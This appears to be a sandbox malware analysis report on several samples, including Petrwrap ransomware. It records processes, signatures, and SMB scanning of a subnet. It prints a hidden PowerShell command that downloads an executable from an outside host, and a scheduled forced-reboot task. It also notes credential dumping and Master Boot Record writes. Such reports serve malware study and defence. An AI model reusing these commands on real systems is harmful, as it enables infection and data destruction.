"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\e3ffa307a7d0471fa6045809606adf9c /t 180 /p 1768

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log

Network


Files


Analysis: behavioral22

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1385s

Max time network

1176s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2104 wrote to memory of 1612 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2104 -ip 2104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\51030.exe');

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 1368

Network

Country Destination Domain Proto

Files


Analysis: behavioral23

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

1797s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dist.torproject.org udp

Files


Analysis: behavioral32

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

441s

Max time network

1163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\out.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\out.exe

"C:\Users\Admin\AppData\Local\Temp\out.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1296 -ip 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1296 -ip 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 224

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1338s

Max time network

1126s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240226-en

Max time kernel

1802s

Max time network

1807s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E659.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\BackupSkip.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\PushWrite.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\{A22979E4-D188-4AF0-A888-04FE21284B11}\EDGEMITMP_19EA3.tmp\MSEDGE.PACKED.7Z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E659.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\E659.tmp

"C:\Users\Admin\AppData\Local\Temp\E659.tmp" \\.\pipe\{AC49C51E-66E5-48DC-B6A9-6350A75469BA}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3824 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3708 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.88:139 tcp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.92:139 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:445 tcp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.102:445 tcp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.108:139 tcp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.37:139 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:445 tcp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.122:445 tcp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.128:139 tcp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.47:139 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.134:139 tcp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
N/A 10.127.0.135:445 tcp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
N/A 10.127.0.135:139 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.141:139 tcp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.148:445 tcp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.155:445 tcp
